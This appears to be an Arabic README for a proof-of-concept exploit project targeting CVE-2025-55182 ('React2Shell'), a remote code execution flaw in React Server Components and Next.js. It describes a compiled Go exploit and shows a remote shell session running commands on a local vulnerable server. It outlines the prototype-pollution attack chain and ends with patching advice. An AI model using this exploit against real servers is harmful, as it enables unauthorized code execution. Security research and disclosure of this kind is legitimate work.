
يوفر هذا المشروع عرضًا توضيحيًا كاملاً لوظائف CVE-2025-55182 (React2Shell) - وهو ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في مكونات خادم React و Next.js.
يوفر هذا المشروع عرضًا توضيحيًا كامل الوظائف لـ CVE-2025-55182 (React2Shell) - ثغرة تنفيذ الأوامر الحرجة عن بُعد في مكونات خادم React و Next.js.
الحالة: ✅ يعمل - يحقق تنفيذ أوامر فعلية على الخوادم الضعيفة
CVE-2025-55182 (ملف تنفيذي 7.8 ميجابايت)📥 تحميل الفيديو التوضيحي (5.6 ميجابايت) - انقر للتحميل ومشاهدة الاستغلال عمليًا
ما يظهره الفيديو:
cd exploited-server
npm run dev
# يبدأ الخادم على http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# عند الطلب:
Target: localhost:3001
الأوامر الأساسية:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
عمليات الملفات:
subh@rce $ touch hello.txt
[+] تم الإنشاء: hello.txt
subh@rce $ vi hello.txt
[i] أدخل محتوى جديدًا (اكتب 'EOF' في سطر منفصل للإنهاء):
Hello World!
EOF
[+] تم حفظ الملف: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] تمت كتابة الملف
subh@rce $ rm hello.txt
[+] تم الحذف: hello.txt
معلومات النظام:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
الخروج:
subh@rce $ exit
يوضح هذا المشروع:
✅ الاستغلال الحقيقي - RCE عامل فعليًا على أنظمة ضعيفة
✅ البحث الأمني - فهم ثغرات أطر العمل الحديثة
✅ تطوير Go - تجميع واستخدام أدوات الأمان
✅ تحليل الثغرات - أبحاث CVE وتقنيات الاستغلال
✅ الإفصاح المسؤول - ممارسات اختبار أمان أخلاقية
react-2-shell-demo/
├── CVE-2025-55182 # ملف الاستغلال المترجم (Go)
├── main.go # كود المصدر Go
├── exploited-server/ # تطبيق Next.js الضعيف
│ ├── app/
│ │ ├── actions.ts # إجراءات الخادم (ضعيفة)
│ │ └── page.tsx # واجهة التحذير
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # التوثيق
تستغل CVE-2025-55182 إلغاء التسلسل غير الآمن في مكونات خادم React:
__proto__Function()1. إنشاء حمولة متعددة الأجزاء مع قطع خبيثة
2. إرسالها إلى نقطة نهاية إجراءات خادم Next.js
3. تشغيل تلوث النموذج الأولي عبر __proto__:then
4. استدعاء منشئ Function() مع الأمر
5. تنفيذ الكود وإعادة المخرجات عبر إعادة التوجيه
6. تحليل النتيجة من رأس X-Action-Redirect
إشعارات هامة:
README.md - هذا الملفGO_EXPLOIT_USAGE.md - استخدام الاستغلال بالتفصيلVULNERABLE_SERVER.md - دليل إعداد الخادمEXPLOITATION_GUIDE.md - غوص تقني عميقUSAGE.md - أمثلة استخدام وأوامرnpm run dev في exploited-server)./CVE-2025-55182)يوضح هذا المشروع بنجاح:
للأنظمة الإنتاجية:
التحديث فورًا إلى الإصدارات المصححة:
تدوير الأسرار إذا تم كشفها قبل 4 ديسمبر 2025
مراقبة السجلات بحثًا عن نشاط مشبوه في إجراءات الخادم
تدقيق التطبيقات التي تستخدم مكونات الخادم
@subhdotsol - لأغراض تعليمية وبحث أمني
هذا الكود للأغراض التعليمية واختبار الأمان المصرح به فقط.
تذكر: احصل دائمًا على الإذن المناسب قبل الاختبار. استخدم بمسؤولية! 🔒